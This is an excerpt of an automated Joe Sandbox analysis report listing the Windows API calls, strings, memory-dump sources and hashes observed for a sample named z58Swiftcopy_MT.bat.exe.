                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 10001FCA
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27696729250.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27696679274.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27696753129.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27696776514.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Global$Free$lstrcpy$Alloc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4227406936-0
                                                                                                                                                                                                                                      • Opcode ID: 4cb5dc2aea9cf7ab25a3b1e4be44dc9197e12157622a09bbe3f88e709afef852
                                                                                                                                                                                                                                      • Instruction ID: 780798ea066e4ece118e8e5fed0bf18c828ec290136deaf2e43fc5d0554b8685
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4cb5dc2aea9cf7ab25a3b1e4be44dc9197e12157622a09bbe3f88e709afef852
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17129971D0424ADFFB20CFA4C8847EEBBF4FB043C4F61852AD5A1A2199DB749A81CB51
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(00408408,?,00000001,004083F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040214D
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004083F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021FC
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne, xrefs: 0040218D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne
                                                                                                                                                                                                                                      • API String ID: 123533781-2316051892
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402707
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1974802433-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CC2
                                                                                                                                                                                                                                      • ShowWindow.USER32(?), ref: 00403CDF
                                                                                                                                                                                                                                      • DestroyWindow.USER32 ref: 00403CF3
                                                                                                                                                                                                                                      • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403D0F
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00403D30
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D44
                                                                                                                                                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403D4B
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00403DF9
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403E03
                                                                                                                                                                                                                                      • SetClassLongA.USER32(?,000000F2,?), ref: 00403E1D
                                                                                                                                                                                                                                      • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403E6E
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00403F14
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,?), ref: 00403F35
                                                                                                                                                                                                                                      • EnableWindow.USER32(?,?), ref: 00403F47
                                                                                                                                                                                                                                      • EnableWindow.USER32(?,?), ref: 00403F62
                                                                                                                                                                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F78
                                                                                                                                                                                                                                      • EnableMenuItem.USER32(00000000), ref: 00403F7F
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403F97
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403FAA
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00420D30,?,00420D30,00000000), ref: 00403FD4
                                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,00420D30), ref: 00403FE3
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,0000000A), ref: 00404117
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                                                                                                                      • String ID: 0B
                                                                                                                                                                                                                                      • API String ID: 184305955-4132856435
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040432E
                                                                                                                                                                                                                                      • GetDlgItem.USER32(00000000,000003E8), ref: 00404342
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404360
                                                                                                                                                                                                                                      • GetSysColor.USER32(?), ref: 00404371
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404380
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040438F
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00404392
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043A1
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043B6
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 00404418
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000), ref: 0040441B
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404446
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404486
                                                                                                                                                                                                                                      • LoadCursorA.USER32(00000000,00007F02), ref: 00404495
                                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 0040449E
                                                                                                                                                                                                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 004044B4
                                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 004044B7
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000111,00000001,00000000), ref: 004044E3
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000010,00000000,00000000), ref: 004044F7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                                                                      • String ID: Call$N$nB@
                                                                                                                                                                                                                                      • API String ID: 3103080414-3023683851
                                                                                                                                                                                                                                      • Opcode ID: be1686f5ab50b662bbe0d02e149cf8afdcfbb49c1a0c534bd92e439938163a57
                                                                                                                                                                                                                                      • Instruction ID: d5db58c66581f694922deb7e8fae8f0f3f349f8e9ef4465256bb12a48e84c332
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: be1686f5ab50b662bbe0d02e149cf8afdcfbb49c1a0c534bd92e439938163a57
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E61A4B1A40209BFDB109F61DD45F6A7B69FB84714F10803AFB05BA2D1C7B8A951CF98
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                                                      • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                                                                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                                                      • DrawTextA.USER32(00000000,00423F20,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                      • String ID: F
                                                                                                                                                                                                                                      • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                      • Opcode ID: bdf52cc5ae8694a0bdbebf00984b2734c5f81ee4e26e9c894a20d3f53608c02a
                                                                                                                                                                                                                                      • Instruction ID: efe066deb40a78245321151b9dab29af26a41e73ee4a669cec0cc25ab5e9cd35
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bdf52cc5ae8694a0bdbebf00984b2734c5f81ee4e26e9c894a20d3f53608c02a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 89418C71800209AFCF058F95DE459AFBBB9FF45315F00802EF5A1AA1A0CB389A55DFA4
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405E99,?,?), ref: 00405D39
                                                                                                                                                                                                                                      • GetShortPathNameA.KERNEL32(?,00422AC0,00000400), ref: 00405D42
                                                                                                                                                                                                                                        • Part of subcall function 00405B97: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405DF2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BA7
                                                                                                                                                                                                                                        • Part of subcall function 00405B97: lstrlenA.KERNEL32(00000000,?,00000000,00405DF2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD9
                                                                                                                                                                                                                                      • GetShortPathNameA.KERNEL32(?,00422EC0,00000400), ref: 00405D5F
                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00405D7D
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00422EC0,C0000000,00000004,00422EC0,?,?,?,?,?), ref: 00405DB8
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405DC7
                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DFF
                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(0040A3D0,00000000,00000000,00000000,00000000,004226C0,00000000,-0000000A,0040A3D0,00000000,[Rename],00000000,00000000,00000000), ref: 00405E55
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00405E66
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405E6D
                                                                                                                                                                                                                                        • Part of subcall function 00405C32: GetFileAttributesA.KERNELBASE(00000003,00402DDB,C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe,80000000,00000003), ref: 00405C36
                                                                                                                                                                                                                                        • Part of subcall function 00405C32: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C58
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                                                                      • String ID: %s=%s$[Rename]
                                                                                                                                                                                                                                      • API String ID: 2171350718-1727408572
                                                                                                                                                                                                                                      • Opcode ID: f38d8d20ea3c52f409b1efdd4663a8df0a06a90a62bb981f7671b6e2d5e9100d
                                                                                                                                                                                                                                      • Instruction ID: d3b28aaf25f2f1dce52cf372ecf52c774524a9466fe584fbe8e796e5af075e1b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f38d8d20ea3c52f409b1efdd4663a8df0a06a90a62bb981f7671b6e2d5e9100d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 97312331200B19BBC2206B61EE49F2B3A5CDF85754F14043AF985F62D2DB7CA9018ABD
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe",762D3410,C:\Users\user\AppData\Local\Temp\,00000000,004032E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 0040635B
                                                                                                                                                                                                                                      • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406368
                                                                                                                                                                                                                                      • CharNextA.USER32(?,"C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe",762D3410,C:\Users\user\AppData\Local\Temp\,00000000,004032E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 0040636D
                                                                                                                                                                                                                                      • CharPrevA.USER32(?,?,762D3410,C:\Users\user\AppData\Local\Temp\,00000000,004032E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 0040637D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • *?|<>/":, xrefs: 0040634B
                                                                                                                                                                                                                                      • "C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe", xrefs: 0040633F
                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00406304
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Char$Next$Prev
                                                                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                      • API String ID: 589700163-3315247575
                                                                                                                                                                                                                                      • Opcode ID: b04103f1c3b5c2dc28f3c9fe732184cb0b910e084cb0e1e3de7299130b8356f6
                                                                                                                                                                                                                                      • Instruction ID: aaadfa82e77317605f3281ec64e2e7980eb4a55dd70e9bd95d11bcdf30b36afc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b04103f1c3b5c2dc28f3c9fe732184cb0b910e084cb0e1e3de7299130b8356f6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6011826180479129EB3216384C44BBBAFD84B57760F5A407FEDC6722C2D67C6C6286AD
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetWindowLongA.USER32(?,000000EB), ref: 004041DE
                                                                                                                                                                                                                                      • GetSysColor.USER32(00000000), ref: 004041FA
                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00404206
                                                                                                                                                                                                                                      • SetBkMode.GDI32(?,?), ref: 00404212
                                                                                                                                                                                                                                      • GetSysColor.USER32(?), ref: 00404225
                                                                                                                                                                                                                                      • SetBkColor.GDI32(?,?), ref: 00404235
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040424F
                                                                                                                                                                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00404259
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2320649405-0
                                                                                                                                                                                                                                      • Opcode ID: ae3d8a9df92c775f8f54e71e017c7c1ec6869770dfd215418e325c2b67ca61e7
                                                                                                                                                                                                                                      • Instruction ID: ef1bd211f687dc199c5e2a556594d88cbafbffeaa14e1023ebc7d04ec3d96a61
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae3d8a9df92c775f8f54e71e017c7c1ec6869770dfd215418e325c2b67ca61e7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A32184B1504704ABC7219F78DD08B5BBBF8AF81714F04896DFAD5E26A0D734E944CB64
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 100024B3
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100024ED
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27696729250.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Global$Free$Alloc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1780285237-0
                                                                                                                                                                                                                                      • Opcode ID: 9b8f7426cd7417a05f7efaca6ab9ef20acf91f7aea9c9defdea317c740d0f0ba
                                                                                                                                                                                                                                      • Instruction ID: c0db1d51d0d8beb2da32add46ec64f24e8f484468aa98c5ce89375ba0c102a5a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9b8f7426cd7417a05f7efaca6ab9ef20acf91f7aea9c9defdea317c740d0f0ba
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0831A9B1504211EFF322DB94CCC4C2B7BBDEB853D4B118929FA4193228CB31AC94DB62
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000,?), ref: 004051F9
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00402D70,00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000), ref: 00405209
                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00420510,00402D70,00402D70,00420510,00000000,00000000,00000000), ref: 0040521C
                                                                                                                                                                                                                                      • SetWindowTextA.USER32(00420510,00420510), ref: 0040522E
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405254
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040526E
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001013,?,00000000), ref: 0040527C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2531174081-0
                                                                                                                                                                                                                                      • Opcode ID: fcc158ebca62b9556dfbd252b9eba4bb3779b7d310f90d2e7aaaf4a512f9cf01
                                                                                                                                                                                                                                      • Instruction ID: 0096fbd02e39835f1f24d83275f9c38cb3dbb50e4440d35a5143882a1b4174d0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fcc158ebca62b9556dfbd252b9eba4bb3779b7d310f90d2e7aaaf4a512f9cf01
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D218C71900518BFDF119FA5DD84A9EBFB9FF04354F0480BAF904B6291C7798A418FA8
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DestroyWindow.USER32(00000000,00000000), ref: 00402D11
                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00402D2F
                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00402D5D
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: lstrlenA.KERNEL32(00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000,?), ref: 004051F9
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: lstrlenA.KERNEL32(00402D70,00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000), ref: 00405209
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: lstrcatA.KERNEL32(00420510,00402D70,00402D70,00420510,00000000,00000000,00000000), ref: 0040521C
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: SetWindowTextA.USER32(00420510,00420510), ref: 0040522E
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405254
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040526E
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040527C
                                                                                                                                                                                                                                      • CreateDialogParamA.USER32(0000006F,00000000,00402C61,00000000), ref: 00402D81
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402D8F
                                                                                                                                                                                                                                        • Part of subcall function 00402CDD: MulDiv.KERNEL32(00000000,00000064,00020B0D), ref: 00402CF2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                                                                                                                      • String ID: ... %d%%
                                                                                                                                                                                                                                      • API String ID: 722711167-2449383134
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AA6
                                                                                                                                                                                                                                      • GetMessagePos.USER32 ref: 00404AAE
                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00404AC8
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404ADA
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B00
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
